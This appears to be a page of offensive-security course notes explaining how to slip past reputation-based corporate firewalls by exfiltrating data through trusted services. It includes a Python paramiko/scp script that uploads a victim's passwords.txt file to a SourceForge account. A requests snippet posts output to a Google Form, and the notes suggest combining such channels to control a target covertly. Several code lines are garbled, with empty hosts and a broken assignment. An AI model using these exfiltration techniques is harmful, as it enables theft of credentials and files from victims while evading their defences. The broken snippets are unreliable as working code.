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Bypassing Next Generation Firewalls

From course: Python For Offensive PenTest: A Complete Practical Course.

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Corporate firewall (Next Generation Firewalls) can block traffic based on the reputation of the target IP/url. This means that once we achieve to execute the malicious client side script on the victim's machine, this next generation firewall might block/defer the connection if the reputation or the rank of the target URL/IP belongs to a pool of resources supplied by the vendor and it's categorized as low.

To overcome this filter, modern malware is using trusted targets.

Using Source Forge for data exfiltration

1. Signup in Source Forge

You will get credentials for configuring your SFTP agent in step 3.

2. Install filezilla. It will work as our SFTP agent:

sudo apt-get install filezilla

3. Configure filezilla and connect.

username: usernameinSourceForge
password: passwordinSourceForge
port: 22

4. Install these two python libraries on the victim's machine: paramiko and scp.

pip install paramiko
pip install scp

5. Run the script on the victim's machine:

Using this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. 
Use it on your own risk. 

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved 
# Follow me on LinkedIn

import paramiko
import scp

# File Management on SourceForge 
# [+]

ssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class


ssh_client.connect("", username="myusernameatSourceForge", password="PASSWORD HERE") #Authenticate ourselves to the sourceforge. Server, user and password from step 1
print ("[+] Authenticating against")

scp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function

scp.put("C:/Users/Alex/Desktop/passwords.txt") # upload a file, for instance password.txt
print ("[+} File is uploaded")


print("[+] Closing the socket")

Using Google Forms for submitting output

1. Create a Google Form with a quick test and copy the link of the survey.

2. Copy the name of the form from the source code of the google form.

name of the form

3. Paste URL of the survey + name of the form in the script:

Using this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. 
Use it on your own risk. 

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved 
# Follow me on LinkedIn

import requests

url = ''

form_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'}

r =, data=form_data)

# Submitting form-encoded data in requests:-


Try to combine the above ideas (Google Form + Twitter + SourceForge) Into a single script and see if you can control your target without direct interaction.
Last update: 2024-03-29
Created: April 10, 2023 16:52:50